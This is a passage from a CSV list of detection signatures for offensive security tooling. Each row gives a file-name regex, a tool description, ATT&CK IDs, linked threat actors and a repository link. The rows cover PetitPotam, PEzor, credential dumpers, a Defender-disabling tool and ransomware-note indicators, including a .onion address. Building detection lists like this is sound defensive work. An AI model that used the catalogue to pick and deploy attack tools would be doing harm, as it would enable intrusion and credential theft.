- XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","N/A","10","10","274","44","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z","54707"
"*persist-ice-time.o*",".{0,1000}persist\-ice\-time\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","N/A","10","10","274","44","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z","54708"
"*persist-ice-xll.o*",".{0,1000}persist\-ice\-xll\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","N/A","10","10","274","44","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z","54709"
"*PersStartup.cs*",".{0,1000}PersStartup\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","54710"
"*PEScrambler.exe*",".{0,1000}PEScrambler\.exe.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","54711"
"*peterdocter/quarkspwdump*",".{0,1000}peterdocter\/quarkspwdump.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","1","N/A","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","54712"
"*PetitPotam bypass via RPC_C_AUTHN_LEVEL_PKT_PRIVACY*",".{0,1000}PetitPotam\sbypass\svia\sRPC_C_AUTHN_LEVEL_PKT_PRIVACY.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","54713"
"*PetitPotam.cna*",".{0,1000}PetitPotam\.cna.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","54714"
"*PetitPotam.cpp*",".{0,1000}PetitPotam\.cpp.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","10","1944","290","2024-08-15T03:52:26Z","2021-07-18T18:19:54Z","54715"
"*PetitPotam.exe*",".{0,1000}PetitPotam\.exe.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","54716"
"*PetitPotam.exe*",".{0,1000}PetitPotam\.exe.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","10","1944","290","2024-08-15T03:52:26Z","2021-07-18T18:19:54Z","54717"
"*PetitPotam.ps1*",".{0,1000}PetitPotam\.ps1.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","54718"
"*PetitPotam.py*",".{0,1000}PetitPotam\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","54719"
"*petitpotam.py*",".{0,1000}petitpotam\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","54720"
"*petitpotam.py*",".{0,1000}petitpotam\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","54721"
"*PetitPotam.py*",".{0,1000}PetitPotam\.py.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","10","1944","290","2024-08-15T03:52:26Z","2021-07-18T18:19:54Z","54722"
"*PetitPotam.py*",".{0,1000}PetitPotam\.py.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","N/A","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","54723"
"*PetitPotam.sln*",".{0,1000}PetitPotam\.sln.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","54724"
"*PetitPotam.sln*",".{0,1000}PetitPotam\.sln.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","10","1944","290","2024-08-15T03:52:26Z","2021-07-18T18:19:54Z","54725"
"*PetitPotam.vcxproj*",".{0,1000}PetitPotam\.vcxproj.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","54726"
"*PetitPotam:main*",".{0,1000}PetitPotam\:main.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/topotam/PetitPotam","1","0","N/A","N/A","10","10","1944","290","2024-08-15T03:52:26Z","2021-07-18T18:19:54Z","54727"
"*petitpotam_check*",".{0,1000}petitpotam_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","54728"
"*PetitPotamModified.exe*",".{0,1000}PetitPotamModified\.exe.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","N/A","10","6","518","92","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z","54729"
"*PetitPotato 3 cmd*",".{0,1000}PetitPotato\s3\scmd.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","54730"
"*PetitPotato.Build.CppClean.log,*",".{0,1000}PetitPotato\.Build\.CppClean\.log,.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","54731"
"*PetitPotato.exe*",".{0,1000}PetitPotato\.exe.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","1","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","54732"
"*PetitPotato.lastbuildstate*",".{0,1000}PetitPotato\.lastbuildstate.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","54733"
"*PEzor generated Beacon Object File*",".{0,1000}PEzor\sgenerated\sBeacon\sObject\sFile.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","54734"
"*PEzor!! v*",".{0,1000}PEzor!!\sv.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","54735"
"*PEzor*/Inject.c*",".{0,1000}PEzor.{0,1000}\/Inject\.c.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","54736"
"*Pezor*inject.hpp*",".{0,1000}Pezor.{0,1000}inject\.hpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","54737"
"*PEzor.sh -*",".{0,1000}PEzor\.sh\s\-.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","54738"
"*PEzor.sh *.bin*",".{0,1000}PEzor\.sh\s.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","54739"
"*PEzor.sh -32*",".{0,1000}PEzor\.sh\s\-32.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","54740"
"*PEzor.sh -64*",".{0,1000}PEzor\.sh\s\-64.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","54741"
"*PEzor/*/bof.cpp*",".{0,1000}PEzor\/.{0,1000}\/bof\.cpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","54742"
"*PEzor/*syscalls.hpp*",".{0,1000}PEzor\/.{0,1000}syscalls\.hpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","54743"
"*PEzor\inject.cpp*",".{0,1000}PEzor\\inject\.cpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","54744"
"*pfsense*reverse_root_shell_csrf/*",".{0,1000}pfsense.{0,1000}reverse_root_shell_csrf\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","54745"
"*pfx2john.py*",".{0,1000}pfx2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","54746"
"*pg3n5bteiatjf6rt7oa4xhzo4sj736rifjmk4gtowxjljuwwdv6mccyd.onion*",".{0,1000}pg3n5bteiatjf6rt7oa4xhzo4sj736rifjmk4gtowxjljuwwdv6mccyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","54747"
"*PGh0bWw+DQoJPGhlYWQ+DQoJCTx0aXRsZT5JbmMuIFJhbnNvbXdhcmU8*",".{0,1000}PGh0bWw\+DQoJPGhlYWQ\+DQoJCTx0aXRsZT5JbmMuIFJhbnNvbXdhcmU8.{0,1000}","offensive_tool_keyword","Inc","Inc ransomware","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#content","N/A","10","4","357","52","2025-04-22T10:00:56Z","2021-07-28T21:00:52Z","54749"
"*pgkt04/defender-control*",".{0,1000}pgkt04\/defender\-control.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","1","N/A","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","54750"
"*pgpdisk2john.py*",".{0,1000}pgpdisk2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","54751"
"*pgpsda2john.py*",".{0,1000}pgpsda2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","54752"
